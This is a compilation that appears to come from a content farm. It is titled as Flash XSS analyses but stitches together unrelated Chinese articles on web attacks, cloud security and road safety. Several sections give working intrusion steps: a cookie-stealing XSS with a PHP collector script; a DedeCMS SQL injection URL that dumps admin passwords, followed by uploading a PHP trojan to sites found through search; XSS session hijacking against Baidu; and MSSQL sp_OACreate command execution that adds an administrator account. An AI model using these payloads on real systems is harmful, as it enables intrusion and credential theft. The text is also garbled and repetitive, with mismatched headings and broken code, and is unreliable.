若干flash xss漏洞分析脚本安全

若干flash xss漏洞分析脚本安全（精选14篇）

篇1：若干flash xss漏洞分析脚本安全

1． 构造一个提交，目标是能够显示用户Cookie信息：

www.xxxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6

2． 如果上面的请求获得预期的效果，那么我们就可以尝试下面的请求：

www.xxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6

其中www.xxx.org/info.php是你能够控制的某台主机上的一个脚本，功能是获取查询字符串的信息，内容如下：

 

$info = getenv(“QUERY_STRING”);

if ($info) {

$fp = fopen(“info.txt”,“a”);

fwrite($fp,$info.“n”);

fclose($fp);

}

header(“Location: www.xxx.net”);

注：“%2B”为“+”的URL编码，并且这里只能用“%2B”，因为“+”将被作为空格处理，

篇2：若干flash xss漏洞分析脚本安全

作者不知道是谁

问题出现在buy_action.php

没有对pid传递进行足够的重视

导致出现SQL注射问题!

注册地址

/member/index_do.php?fmdo=user&dopost=regnew

爆管理员密码

/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

用很大。 如果你找不到可以利用的 那就是自己RP问题

反正 我们是找到很多了，而且是流量比较大的站，很不错的站。

更正一下：

LZ发的代码因为这个.NET版本的论坛有问题所以没显示全 全部代码是：

暴管理员密码：

CODE:

/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

首先在

GOOGLE搜Power by DedeCms

先注册一个号,注册成功后

直接输入下面的

include/dialoguser/select_soft.php或者

include/dialoguser/select_media.php

然后上传一个PHP马，

先要改下后缀，改可以上传的就可以了，然后再改名的地址输入 木马名字.PHP

上传成功

直接访问

所在目录的路径/木马名字.php

篇3：若干flash xss漏洞分析脚本安全

一、云计算的核心内容及应用概况

1.1云计算的核心内容

所谓云计算, 就是利用网络访问量进行按需计算的模式。该模式能够让人们更加便捷地进行网络访问, 更加快速在网络上查找自己所需的资料和信息, 使人们的工作效率大大提高, 减少了时间成本。

更加通俗地说, E-mail、Office办公软件、网络存储、社交通讯软件等深受广大网民喜欢的工具和服务都属于云计算范围。

云计算的主要构架是能够进行动态升级和进行虚拟化地存储资源, 并且用户能够通过网络进行资源的共享和下载。广大网民并不需要对云计算有充分的了解也能够利用云计算便利地在网络上获取个人所需的资源信息。

1.2云计算的运用概况

当前, 云计算已经不是特定的技术产品, 而是符合广大网民生活学习的网络技术, 云计算服务已经深入人们生活之中。云计算通过网络进行资源信息的共享和传播, 对各行各业都有深入地影响。就当前而已, 云计算的应用有以下三个趋势:

第一, 进行大数据的处理。随着科学技术的发展和信息量的剧增, 原有的互联网技术已经不能满足日益提高的人们需求。互联网上的数据量之多已经无法进行衡量。当前, 许多互联网公司针对用户的需求进行大量数据的处理以及资料的存储, 以满足用户的需求;在此过程中, 处理大量数据的能力以及超出了传统的IT计算方式, 使用云计算技术成为普遍采用的方式。

第二, 运用到企业生产管理中。随着现代化企业建设的进程加快, 企业每天需要进行大量的数据处理, 公司的发展也需要更迅速的通讯、数据处理手段。传统的IT构架已经不能够满足企业的发展需求, 因此企业将传统的计算中心等设备淘汰转而使用云计算服务方式, 通过虚拟化的网络服务, 对所需数据进行计算整理, 实现公司资源的优化配置, 提高了企业的生产效率以及管理水平[1]。

第三, 广泛运用中小企业中, 实现社会化的IT服务。现有的云服务由于成本高、技术水平要求高, 不适用于中小企业。中小企业只能使用传统的硬件设备进行企业数据的运算。

随着网络科技的发展, 云计算的商业化趋势越来越明显, 通过实现社会化的IT服务, 使中小企业也能够进行淘汰传统的计算方式, 而使用高速度的虚拟化的云计算服务[2]。

二、云计算服务中数据安全存在的主要问题

2.1网络通讯威胁

网络通讯威胁是指在云计算服务中, 用户通过使用网络进行数据的传输过程中面临的安全威胁, 或者受到黑客攻击导致数据的传输故障。一般表现为, 用户的数据受到恶意地篡改、数据隐私得不到保护、甚至数据遭到破坏。此外, 在云服务中通过网络监听、身份哄骗等手段对用户数据进行非法获取, 破换了用户数据机密[3]。

2.2存储安全威胁

用户在网络中进行数据的存储过程中, 由于并没有使用加密手段, 使得用户的数据收到威胁。此种情况下, 不仅有外部因素, 内部人员也是重要的威胁对象。当用户在使用云服务中进行数据存储时受到攻击, 对用户数据就会产生泄露的危险。

一是黑客直接接触存储介质。攻击者在逃避了监控之后对用户存放数据的介质直接进行了接触并恶意篡改用户数据信息、增加或者删除用户数据。二是用户在进行云存储时并没有对数据进行加密处理, 从而使数据受到攻击而泄露。三是云计算服务商没有及时进行用户数据的拷贝, 在受到攻击之后造成用户数据的永久性丢失。

2.3身份认证因素威胁

在云计算中, 攻击者利用非法手段入侵第三方服务器盗取用户资料, 并对用户的身份认证信息篡改, 使用用户账户登陆、恶意泄露用户信息[4]。虽然攻击者对自己的所为并不承认, 但却不能否认用户数据遭到了破坏。

三、云计算服务中数据安全问题的防范对策

3.1进行技术控制

技术控制是实现云计算服务中数据安全的有效手段。技术人员通过技术控制, 对云计算服务进行实时监控, 一旦发现威胁, 立即进行中止计算和服务, 保护用户的数据安全和隐私安全。一是云服务商技术人员通过技术控制确保用户数据的安全, 并将用户数据进行实时拷贝更新, 确保用户数据的安全性和永久实用性;二是进行用户间的数据隔离, 避免虚拟服务器相互攻击;三是及时更新系统补丁, 避免系统漏洞对用户数据造成泄漏、破坏用户数据。

3.2建立安全的文件存储模块

在云计算中有一个存储模块专门用来进行用户数据的备份存储。用户能够使用账户登陆进行数据的删改和存储替换。因此, 技术人员在数据存储中采用加密的数据存储模块, 为用户提供安全密码进行后台的登陆和数据的增改、删除、更新[5]。

如果安全密码错误, 则服务器就会拒绝用户访问, 并在多次错误后进行账户的锁定, 确保用户数据的安全隐私。通过文件存储模块的使用, 使得用户数据能够在云计算服务中得到有效存储, 保证数据的安全。

3.3建立安全的身份认证措施

身份认证措施是比较复杂和先进的措施, 在云计算服务中使用安全身份认证措施, 能够加强对用户数据的保护。云计算服务商技术人员可以根据个人特征构建多重认证方式。例如进行实时身份认证, 对用户的认证行为和身份信息进行追踪分析[6]。

在建立身份认证之时, 对身份加密机制进行四个阶段地建立:一是参数提取阶段, 即对用户的私有信息与云计算目的服务器的身份描述相符;二是系统设置阶段通过设置用户安全密码用作用户登录服务器之用;三是加密阶段对用户的身份认证信息进行加密;四是解密阶段对用户的登录访问请求进行身份验证后的解密登录。通过身份认证措施, 对用户的身份认证进行加密, 确保用户的数据安全。

四、结束语

虽然云计算服务为人民的生活工作提供了诸多便利, 但其数据安全问题一直受到社会的普遍关注。在对云计算服务中存在的数据安全问题进行了解之后, 需要采取切实有效的措施对用户数据进行加密保护, 确保用户数据的可靠性、安全性, 使广大用户能更好地利用云计算服务生活工作, 同时也为云计算服务的发展指明了方向。

摘要：随着网络技术的进步, 传统的网络技术已经不能满足当前网络数据运算。云计算作为目前最为先进的超级计算方式, 被广泛采用在网络技术中。但是随着黑客技术的升级, 云计算服务中数据的安全不能够得到很好地保障, 这是限制云计算发展的重要因素。本文首先对云计算的核心内容和应用概况进行分析, 其次对当前云计算服务中存在的数据安全问题进行分析, 最后对云计算服务中数据安全的防御对策进行了探讨。

关键词：云计算,数据安全,对策

参考文献

[1]尹鑫.云计算服务中数据安全的若干问题研究[J].电脑知识与技术, 2013, (36) :8270-8272.

[2]田静.云计算服务中数据安全的相关问题研究[J].软件工程师, 2014, (2) :38-39.

[3]李瑞轩, 董新华, 辜希武等.移动云服务的数据安全与隐私保护综述[J].通信学报, 2013, 34 (12) :158-166.

[4]邵华.关于云计算服务中数据安全的问题研究[J].计算机光盘软件与应用, 2013, (24) :163-163, 165.

[5]王象刚.云计算服务中数据安全的问题研究[J].数字化用户, 2013, (24) :56-56.

篇4：交通安全设施设计若干问题分析

摘要：公路交通安全设施是公路设施的重要组成部分，它对于保障行车准确、安全快速、舒适，对于整个交通工程系统的合理运营起着决定性的作用，为车辆通行提供必要的安全警示和安全保障。基于此，本文主要对交通安全设施设计进行了分析，以供参考。

关键词：交通;安全设施;设计

引言

现如今，随着经济的发展，城市进程的不断加快，对交通方面的要求也不断增加。公路安全设施设计是否合理，安全防护系统是否有效，都极大程度上关系到车辆的行驶是否安全，行车是否准确、舒适和安心，是整个交通系统能否舒畅运行的有力保障。随着我国经济的迅速发展，交通运输体系更加完善，对交通工程安全设施设计的要求也逐渐提高，做好优化设计，提升现阶段交通工程建设质量，是新时期交通系统的主要追求。

1交通安全设施设计若干問题分析

为了保障道路交通的安全与畅通，根据道路条件、交通流特点和道路交通管理的需要，依照有关的法律、法规和技术标准，在道路上设置的附属设施和装置，称为道路交通安全设施。按照其设置目的和作用，道路交通安全设施大致可分为以下三种：（1）为了保障交通安全，防止交通事故而在道路上设置的交通设施，包括照明设备、护栏、交通岛、人行天桥、人行过街地道、道路反光镜、减速带等。（2）以限制、警告和诱导交通为目的而设置的交通设施，包括道路交通标志、道路交通标线、交通信号控制系统、交通诱导系统等。此类交通安全设施的作用集中地表现为：约束和限制各种交通流，组织和调节道路交通;向车辆和行人公布并提示特定区域内的交通情况和交通管理信息;为交通管理部门开展交通管理工作提供科学的手段和执法依据。（3）为了有效地发挥车辆的运输效能和道路的功能，保障交通安全所设置的道路交通设施，包括公共汽车停靠站、客运汽车站、货运汽车站、公共及专用停车场、高速公路的服务区等。

2交通工程安全设计原则

（1）全局性。以高速公路设计为例，在建设的过程中，要严格遵守国家交通运输管理局以及建设当地的相应文件作为设计的重要指导依据，在最初设计的基础上，从全局性角度设计高速公路的建设过程，并与建设当地的建筑、居民分布以及我国的交通运输网络相统一。（2）稳定性，安全性。由于近年来交通事故频发，这对各类交通方式的建设质量以及实际评估等提出了更加严格的要求，因此，在交通工程安全设计的过程中，对建设过程中所使用的设备、稳定的建设系统以及当地的经济实力等进行综合考虑，保证交通工程建设的质量以及社会效益。（3）与时俱进性。随着经济、政治、文化等全球化的发展趋势，在交通工程的设计阶段也应注重国外先进建设经验的引进，及时更新我国在施工建设过程中所使用的设备以及技术等，保证在现有条件的基础上，尽量减少建设成本，提升建设质量。（4）融合性。交通工程的建设应与当地的交通运输情况紧密结合，对于不同路段的车辆、人流量、经济发展情况等要进行充分的市场调查，并做好施工后期的延伸性，在设计的过程中，要做到高瞻远瞩，一次性完成交通工程的设计，在建设过程中可根据实际情况分期完成，一旦建设过程中出现各类问题，可做好相应的协调工作。（5）注重后期维护工作的开展。交通工程除了优化设计、提高建设效益、保证建设质量之外，最重要的工作便是做好后期的维护工作，因此，在设计过程中应将此涵盖其中，并安排相应的人员做好管理与维护工作，保证交通工程整个运作过程的顺利进行。

3交通安全设施设计若干问题分析

3.1标线设计

（1）标线的颜色问题。交通安全标线通常有白色和黄色两种颜色，主要是白色为主，但是由于白色线条比较单一，极易让司机产生疲劳感，因而适当增加黄色线条可以起到调节的作用，提高行车的安全。但是黄色标线也存一定的缺陷，即可见性要低于白色，因此标线的设置需耐颜色结合。

（2）标线的宽度问题。经研宄发，纵向标线不会对司乘员心理及交通情形产生负面影响，但是为了减少费用支出，防止出现打滑现象，标线的宽度应设置在15-20cm之间，在实际标线设计时，一般选用的是最小值。通常标线的横向宽度比纵向宽度要大，设计时考虑到驾驶员看到横向标线是由远及近，宽度应当适当增加，一般控制在20-40Cm间，斑马线宽度应设在40CM.。

（3）导向箭头的形式。在选择箭头形式时必须要综合比较目。转弯和直行以及二者结合等多种形式，最合适的箭头形式为直行箭头的宽度是箭杆的四倍，在宽度上要比箭杆略宽。

3.2 交通标志设置

交通标志的设置起到了为驾驶员提供信心和组织引导交通流的作用，其设置主要包括四个方面：指示标志、指路标志、禁令标志、警告标志。为了使驾驶员在行驶运动中更方便的看到标志信息，判断标志的性质，这就要求设计过程中是标志版面简化、明晰。要从司乘人员的接受能力出发，不但要求提供的信息简明、扼要，而且不能信息量过载。这就要求设计者对二者加以平衡，对司乘人员起到最佳的信息指导效果。

交通标志一般都设置在车道的右侧或上方。交通标志在安装时应该和道路的中心线形成一定角度，这样，才能确保驾驶者不会因为逆光，眩光等原因而影响对标志的判读。再者，交通标志之间需要留出一定的距离，合理设计间距，从而使驾驶者能在一定距离内对标志内容进行相应的反应，并作出判断，不会导致视觉疲劳。

3.3护栏设施的设置

（1）护栏的高度。车辆失控碰翻护栏时，护栏如果可以作用到车辆有效部位，车辆就不会翻越至护栏下面，但这并不是理想状态的护栏形式。理想的护栏可以迫使车辆改变方向，恢复正常行驶方向。在对护栏的高度设计时必须要结合路桥工程中路基中心与标高的相关资料进行材质选择及施工。相关就表明，波形护栏的设计高度应在750mm，缆索护栏的高度为950mm，箱梁护栏的高度为700mm。此处的高度均指从地面到护栏顶端的高度。

（2）护栏的长度。护栏有良好好的防护功能，主要是通过连续梁结构发挥防护功能。如果护栏的长度设置较短不仅会影响美观，而且阻碍其功能的发挥，因此，护栏最小限制的设置必须要科学合理。护栏的最小设置长度决定汽车冲撞护栏的能量，所以，最小设置长度需满足以下条件：三、四级公路的波形梁护栏最小设置长度不得小于28米;二级公路的波形梁护栏最小长度不小于48米;一级公路、高速的波形梁护栏最小长度不小于70m。

4结语

近年来，我国的交通运输系统日益完善，对交通工程的安全设计也提出更加严格的要求。交通安全设施的设置对交通事故的产生也有着很大的影响，不合理的交通设施的设置很可能是交通事故的诱因之一;而合理的交通安全设施的设置更是能够降低道路交通事故的发生率。为提高交通工程的整体建设质量，应该结合当今交通运输的发展情况，优化交通安全设施的设计方案。

参考文献：

[1]JTG D81-2006.公路交通安全设施设计规范[S].

[2]李想，张萍.公路交通设施的人性化设计研究[J].科技信息，2010（01）.

[3]刘洪启，吴云，沈涛，张巍汉.基于新理念的公路交通安全设施景观化设计思路[J].中外公路，2009（01）.

[4]张玉娟，赵敬华.基于TETRA数字集群网络的单兵定位指挥调度系统在交通管理中的开发与应用[J].警察技术，2010（04）.

[5]唐强.城市道路交通安全设施类型、设计及应用研究[D].山东大学，2011.

篇5：若干flash xss漏洞分析脚本安全

先来看看大致看了下代码。就分析下这个文件好了

Shownews.asp

。。。。。

sub shownews(l)

dim newsid

newsid=request(“newsid”)

if newsid=“” or not isnumeric(newsid) then

response.redirect“news.asp

。。。。。。

在top.asp文件里面调用了过滤注入的文件

就是这个文件，

具体内容我就不发了。。

接着分析Shownews.asp的代码。我们看。。if 判断newsid数为空 或者不为数字就返回林外页面news.asp...这样以来。。我就无法进行cookies注入了。。我测试了下。如果不是他返回。news.asp的话就可以进行cookies注入。当然。只是如果。毕竟这条路已经走不通。注入是完全没有希望了。。于是就继续分析看有没有xss漏洞。。虽然很多地方都过滤和的还是让我找到一个没有过滤的地方。如图1。然后我们跨站代码。。注意。 会一直循环

篇6：若干flash xss漏洞分析脚本安全

图1-1csrf漏洞的攻击过程

CSRF(Cross-site request forgery跨站请求伪造)通常缩写为CSRF或者XSRF，CSRF使 可以冒充合法用户的身份，使合法用户在不知情的情况下触发如金融支付，发表微博等危险操作，并可直接导致蠕虫，危害巨大，从至今，CSRF漏洞已连续几年位于OWASP统计的十大Web安全漏洞前列。具体利用过程如图1-1所示。

攻击通过在授权用户访问的页面中包含链接或者脚本的方式工作。举一个简单的例子，例如：用户A在自己的博客站点中写了一篇文章C，用户B在回复中贴了一张图，在贴图的URL中写入删除文章C的链接,当A看见这张图片的时候，文章C便被不知不觉间删除了。这就是CSRF攻击了。

2.业界现有CSRF检测技术

2.1业界现有的技术方案

目前对于csrf的检测，业界还没有成熟有效的工具，唯一的一款比较有名的检测工具是由开放式Web应用程序安全项目(OWASP，Open Web Application Security Project)发布的Csrftester，该工具仅支持简单的对页面所提交的表单信息进行抓取，然后由用户人工地进行修改该数据来确定是否存在csrf漏洞，效率低下，无法适应互联网海量CGI漏洞检测的需求。

而其他的扫描器只能半自动发现，但误报极高，例如著名的awvs对csrf扫描的逻辑就比较简单，导致误报率很高。所以，业界一直缺少一个自动的和高准确率的csrf检测工具。

2.2业界现有技术的缺点

1)、不支持自动csrf漏洞检测;

2)、误报率很高。

3.创新的CSRF检测技术

针对近期外部报告的大量csrf漏洞，为快速地解决当前面临的问题，腾讯安全团队自研了一款全自动检测csrf漏洞的工具——CsrfScanner，主要检测基础数据库中的存在的漏洞。csrf产生危险的核心就是利用的他人的cookie来进行有敏感的操作，区别对待带cookie和不带cookie两种情况是扫描器的检测逻辑的关键点。CsrfScanner的检测步骤如下：

1)、不带cooie访问页面得到表单form1。

2)、带cookie访问页面得到表单form2。

3)、判断form1与form2是否为同一个表单，如果不是则转到步骤4。这是因为要取出能利用cookie的form。

4)、判断form2是否存在token、g_tk等字样，如果不存在，则转到步骤5;否则，则说明该指向的cgi有极大的可能做了csrf防御，为了降低误报率，应过滤掉，

5)、判断form2是否存在search、login等黑名单字样，如果不存在，则转到步骤6;否则，则说明该指向的cgi有极大的可能不存在敏感性，为了减低误报率，应过滤掉。

6)、判断form2是否存在保存、修改，提交等白名单字样，如果存在，则说明该form2所指向的cgi具有相当的敏感性，因此检测出该指向的cgi存在csrf漏洞。

CsrfScanner的主要是使用C++开发，使用qtwebkit库在返回的html内容中解析出尽可能多的form，即将js动态生成的form也能显示出来。

以下是CsrfScanner所检测出的漏洞及其利用截图，此为公司微博业务存在CSRF漏洞，可以导致 任意创建微活动并导致蠕虫：

A.用户原本是没有创建微活动的

B. CsrfScanner检测出微活动创建的cgi存在csrf漏洞

据此编写出poc，并挂在站点：hacker.com上

C. 向用户发送一个hacker.com的链接，用户在点击之后，便不知不觉间创建了名为hacker.com的微活动。

D.用户的好友看见此活动后，又去点击链接hacker.com,再度被欺骗性地发起同样的微活动，于是便导致微博蠕虫的泛滥，后果非常严重。

4.效果

csrf漏洞的自动检测一直是业界的技术难点，到目前也没有很好的解决方案，所以一直是我们的扫描器中未覆盖的漏洞类型。而csrf漏洞的数量在tsrc上一直占据前3位。图4-1为7月的tsrc上的漏洞情况，其中csrf有65个，占据了第一位。

自CsrfScanner在7月20日上线后，共发现数千个cgi、数百个域名存在漏洞，误报率低于20%。其中包括discuz, 微博，邮箱等多个重要业务，tsrc上每月仅有个位数的csrf漏洞，较7月的数十个外报有明显收敛。

5.后续

目前腾讯安全团队已经设计出新的csrf漏洞检测方案来进一步提升CsrfScanner的检测能力。简单的说，该方案通过使用webkit内核，hook住敏感的请求，在该请求中检测token是否存在来判断是否存在csrf漏洞，正在排期完成。该方案的增强点主要在

1)、覆盖form以外的csrf漏洞检测，提供更广的检测宽度

2)、更高精度的检测

3)、通过hook每一个敏感请求，能准确定位漏洞的原因

篇7：若干flash xss漏洞分析脚本安全

天天看wooyun上piapiapia弹窗弹的好欢乐，但是真正利用的没几个，也导致了一些人，一些厂商，一些白帽子对XSS危害的蔑视，如果XSS的利用回想当年NBSI一样简单化，也许结果就不同了，

用事实说话。

详细说明：

我们要知道的一个事实是，很多大型互联网企业，其前台防护都很到位，但是没有人会挑保护最好的地方下手，对于前台来说，他的后台就是一个容易被忽视的地方，虽然我们不知道后台程序的构造，但是我们可以根据一些功能的性质来大胆推测，比如互联网公司安全短板--客服反馈系统。

目标地址：tousu.baidu.com

漏洞证明：

找到一个产品的投诉页面，比如文库，想这种功能比较简单的表单，我们直接提交“><这样的代码猜测>

提交后如果运气好的话，

。。。。

访问了一下后台地址，居然是外网可访问的，利用得到的cookie进行会话劫持

跨站漏洞入侵百度投诉中心 用xss平台沦陷百度投诉中心后台” alt=“利用XSS跨站漏洞入侵百度投诉中心 用xss平台沦陷百度投诉中心后台” src=“lcx.cc/File.asp?md5=a31140f9f3cec81d4af7fd04fd8dd26c” data-ke-src=“lcx.cc/File.asp?md5=a31140f9f3cec81d4af7fd04fd8dd26c” width=“685” height=“148” style=“border: 0px; ” nload=“return imgzoom(this,550);” nclick=“javascript.:window.open(this.src);” style=“cursor:pointer;”/>

还有置顶编辑功能，留个脚印

修复方案：

后台不应该对公网全网开放，另外信息展现需要做输出转义。

cookie全局httponly？

摘自：www.wooyun.org/bugs/wooyun--09547

篇8：若干flash xss漏洞分析脚本安全

1网络信息安全存在的主要问题

1.1账户信息极易产生泄露

伴随着数据应用范围逐步扩大, 网络信息安全问题日益凸显, 个人隐私极易发生泄露, 网络黑客可能会捉住网络数据信息泄露契机直接进入个人电脑窃取私密信息。根据互联网信息安全相关报告表明, 在2013年网络数据信息泄露事件比2012年增长速率更快, 大约5.5亿网民身份信息发生泄露, 其中黑客攻击是网络信息数据泄露的最主要原因, 黑客攻击通过窃取个人账户来破坏网民数据信息安全以谋取利益。

在互联网快速发展和电子商务盛行下, 越来越多的网民开始申请网络社交账号和支付宝账户, 用以日常信息交流和日常消费。通常情况下多数用户会使用手机以及邮箱来注册互联网平台账号, 并且在各大网站上进行认证服务。很多网络运营商为了方便客户操作更是赋予用户网络信息账号相互关联的权限, 因此当用户其中一个平台账号数据信息受到黑客攻击时, 另外一个关联账号数据信息也可能会产生泄露。

1.2网民隐私安全受到威胁

网路隐私信息泄露是阻碍大数据时代发展的一个重大因素, 许多网民通常会在各种社交网络平台来发表自己的动态, 并且在公开社交网络平台上和朋友以及家人进行各种信息互动, 而社交网络平台上会保留着动态状况以及聊天记录, 这一行为给网络黑客带来了契机, 他们凭借着高超计算机技术窃取网民用户聊天记录和个人信息, 利用互联网将个人信息泄露出去并用以谋取利益, 严重威胁着用户的信息安全和财产安全。

2探讨解决大数据网络信息安全问题的有效措施

2.1积极开发网络安全技术

随着互联网信息技术快速发展和大数据时代发展进程深入, 黑客攻击和病毒传播以及系统漏洞等问题都对网络信息安全造成很大威胁, 基于此, 应当开发各种新型技术来保障网络信息安全。

设置访问控制。用户使用平台账户访问和浏览网页信息时需要进行身份认证, 从而个人网络信息得到安全保障。在登录账户时需要通过手机验证码才能完成登录, 同时还要严格设置信息访问权限, 避免网民信息被他人窃取。

建立数据加密机制。所谓数据加密是指通过加密算法和加密密钥来加密各种文件信息, 并以加密形式传播网络信息, 这不但能防止黑客攻击, 而且能保障数据安全传播。因此应当建立健全网络加密体系和机制, 从而提高网民信息传播的安全性。

借助于网络防火墙来严格控制网络访问权限, 从而确保数据信息传播以及存储的安全性。即设置两层网络, 分别是内网和外网, 并使用防火墙来严格界定互联网访问内容, 严格监督人员访问网站, 避免非法用户入侵内部网络并窃取内部机密信息。

2.2完善网络信息安全法律法规

为了保障网络信息安全不仅需要坚硬的技术支持, 还需要建立完善的网络信息法律管理制度。当前发达国家已经先后建立了网络信息安全管理法律, 并出台了各种违法犯罪惩罚制度, 不仅能够有效规范网民行为, 还能有效保障国家利益以及消费者基本权益, 因此应当完善网络信息安全法律法规, 约束网民行为。除此之外, 还可以建立互联网监管部门, 加强对网络行为和信息的监督和管理, 积极开展各项网络安全知识以及法律法规宣传活动, 全面提升社会网民的安全意识, 从而有效减少网络信息泄露事件。

2.3提升自身安全防范意识

当前我国多数网民信息安全意识仍然有待提升, 再加上信息安全概念理解模糊, 因此在社交网络或者浏览网站上容易丢失个人隐私信息, 从而受到各种网络安全威胁。所以网民应当加强对信息安全概念的理解, 提高自身网络安全防范意识, 避免个人信息被黑客窃取用以谋取利益, 保障自身信息安全和财产安全, 营造良好的网络环境。

3结束语

总而言之, 随着互联网信息技术快速发展和大数据时代发展进程不断深入, 网络信息安全问题日益凸显, 因此对大数据平台存在的各种网络信息安全问题展开讨论分析, 并就其存在问题提出应对性策略对维护网络信息安全有着重要意义。积极开发网络安全保护技术, 建立健全网络平台信息管理法律制度, 提升网络信息安全防范意识, 从而营造良好的网络平台环境。

参考文献

[1]利用信息网络实施诽谤等犯罪相关问题实证研究课题组.信息网络犯罪司法解释的适用及认定[J].山西省政法管理干部学院学报, 2016, (02) :36-40.

[2]袁新梁.分析计算机网络系统集成技术方法[J].科技与创新, 2016, (10) :157-158.

篇9：用安全扩展拦截无用的脚本

安装相应的安全扩展

既然我们提到了安全扩展，那么我们就首先来安装它。这里以火狐浏览器为例，首先点击“工具”菜单中的“附加组件”命令，在弹出网页的搜索框里面输入“NoScript”查找，找到以后根据提示安装并重新启动浏览器即可（如图1）。如果用户认真观察的话，会发现火狐的扩展页面中，也在推荐这款安全扩展。

当这款NoScript扩展正常运行的时候，就会在浏览器的工具条上显示出这个NoScript扩展的图标。当然如果用户使用的是谷歌浏览器，或者由Chromium衍生出的其他浏览器的话，那么可以在谷歌的应用市场安装一款名为ScripSafe的扩展，同样也可以起到一样的脚本拦截效果。

利用白名单分析判断

我们常见的那些安全软件，通常情况下都是通过黑名单或者病毒库，对网页里面的脚本代码分析判断的。而NoScript扩展正好是反其道而行之，利用白名单来分析判断的。所以在我们访问任何一个网站页面的时候，NoScript扩展就会自动将网页中的所有脚本代码拦截，并且在浏览器窗口的下方通过提示条显示出拦截的脚本代码信息，这样恶意的脚本代码自然而然的不能运行操作了。

但是如果全面禁止所有的脚本代码，那么有的功能将无法正常地运行，比如搜索引擎的查找、视频信息的加载等。所以对于网站必要的脚本代码，我们还是需要允许它运行的，这时就需要使用到白名单。白名单的添加有两种方式，最简单的方法就是导入他人制作的白名单。比如我们首先从知名的安全论坛卡饭下载网友制作的白名单，接着点击窗口下方的NoScript扩展图标。在弹出的菜单里面选择“选项”命令，然后在弹出的对话框里面选择“白名单”标签。点击下面的“导入”按钮，选择刚刚下载的网友制作的白名单文件导入即可（如图2）。这样以后当浏览到白名单中的网站的时候，就会自动放行其中的脚本代码的运行。

自定义添加新白名单

虽然通过白名单可以对一些网站的脚本代码放行，但是并不是我们自己使用的所有网站都可以，所以有的时候我们还需要自己自定义添加一些白名单。这里我们就以新浪视频为例为大家进行介绍。当我们通过火狐浏览器打开访问新浪视频后，照样会在下方显示出被拦截的脚本代码。现在点击浏览器中的NoScript扩展图标，在弹出的菜单里面可以看到调用这些脚本的网页链接。

篇10：若干flash xss漏洞分析脚本安全

作者貌似是isno~硬盘文，方法大家都会偶拖出来看思路滴。

最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单，只需使用下面的SQL语句：

EXECmaster.dbo.xp_cmdshell‘dirc:‘

但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险，他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名，这时侯许多人也许会放弃，因为我们无法运行任何的cmd命令，很难查看对方计算机的文件、目录、开启的服务，也无法添加NT用户。

对此作过一番研究，后来我发现即使xp_cmdshell不可用了，还是有可能在服务器上运行CMD并得到回显结果的，这里要用到SQL服务器另外的几个系统存储过程：sp_OACreate，sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject可用。

sp_OACreate

在Microsoft®SQLServer™实例上创建OLE对象实例。

语法

sp_OACreateprogid,|clsid,

objecttokenOUTPUT

[,context]

sp_OAGetProperty

获取OLE对象的属性值。

语法

sp_OAGetPropertyobjecttoken,

propertyname

[,propertyvalueOUTPUT]

[,index...]

sp_OAMethod

调用OLE对象的方法。

语法

sp_OAMethodobjecttoken,

methodname

[,returnvalueOUTPUT]

[,[@parametername=]parameter[OUTPUT]

[...n]]

思路：

先在SQLServer上建立一个Wscript.Shell，调用其runMethod，将cmd.exe执行的结果输出到一个文件中，然后再建立一个Scripting.FileSystemObject，通过它建立一个TextStream对象，读出临时文件中的字符，一行一行的添加到一个临时表中。

以下是相应的SQL语句

CreateTABLEmytmp(infoVARCHAR(400),IDIDENTITY(1,1)NOTNULL)

DECLARE@shellINT

DECLARE@fsoINT

DECLARE@fileINT

DECLARE@isEndBIT

DECLARE@outVARCHAR(400)

EXECsp_oacreate‘wscript.shell‘,@shelloutput

EXECsp_oamethod@shell,‘run‘,null,‘cmd.exe/cdirc:>c:temp.txt‘,‘0‘,‘true‘

--注意run的参数true指的是将等待程序运行的结果，对于类似ping的长时间命令必需使用此参数。

EXECsp_oacreate‘scripting.filesystemobject‘,@fsooutput

EXECsp_oamethod@fso,‘opentextfile‘,@fileout,‘c:temp.txt‘

--因为fso的opentextfile方法将返回一个textstream对象，所以此时@file是一个对象令牌

WHILE@shell>0

BEGIN

EXECsp_oamethod@file,‘Readline‘,@outout

InsertINTOMYTMP(info)VALUES(@out)

EXECsp_oagetproperty@file,‘AtEndOfStream‘,@isEndout

IF@isEnd=1BREAK

ELSECONTINUE

END

DropTABLEMYTMP

注意：

如果你在进行注入测试时使用这种方法就不能有这样多的换行，必须把它们合为一行，每个语句中间用空格符隔开，

我来给大家一个思路吧：

declare@shellintexecsp_oacreate‘wscript.shell‘,@shelloutputexecsp_oamethod@shell,‘run‘,null,‘c:winntsystem32cmd.exe/cnetlocalgroupadministratorssohu/add‘--

先在SQLServer上建立一个Wscript.Shell，调用其runMethod，将cmd.exe执行的结果输出到一个文件中，然后再建立一个Scripting.FileSystemObject，通过它建立一个TextStream对象，读出临时文件中的字符，一行一行的添加到一个临时表中。

以下是相应的SQL语句

CreateTABLEmytmp(infoVARCHAR(400),IDIDENTITY(1,1)NOTNULL)

DECLARE@shellINT

DECLARE@fsoINT

DECLARE@fileINT

DECLARE@isEndBIT

DECLARE@outVARCHAR(400)

EXECsp_oacreate‘wscript.shell‘,@shelloutput

EXECsp_oamethod@shell,‘run‘,null,‘cmd.exe/cdirc:>c:temp.txt‘,‘0‘,‘true‘

--注意run的参数true指的是将等待程序运行的结果，对于类似ping的长时间命令必需使用此参数。

EXECsp_oacreate‘scripting.filesystemobject‘,@fsooutput

EXECsp_oamethod@fso,‘opentextfile‘,@fileout,‘c:temp.txt‘

--因为fso的opentextfile方法将返回一个textstream对象，所以此时@file是一个对象令牌

WHILE@shell>0

BEGIN

EXECsp_oamethod@file,‘Readline‘,@outout

InsertINTOMYTMP(info)VALUES(@out)

EXECsp_oagetproperty@file,‘AtEndOfStream‘,@isEndout

IF@isEnd=1BREAK

ELSECONTINUE

END

DropTABLEMYTMP

注意：

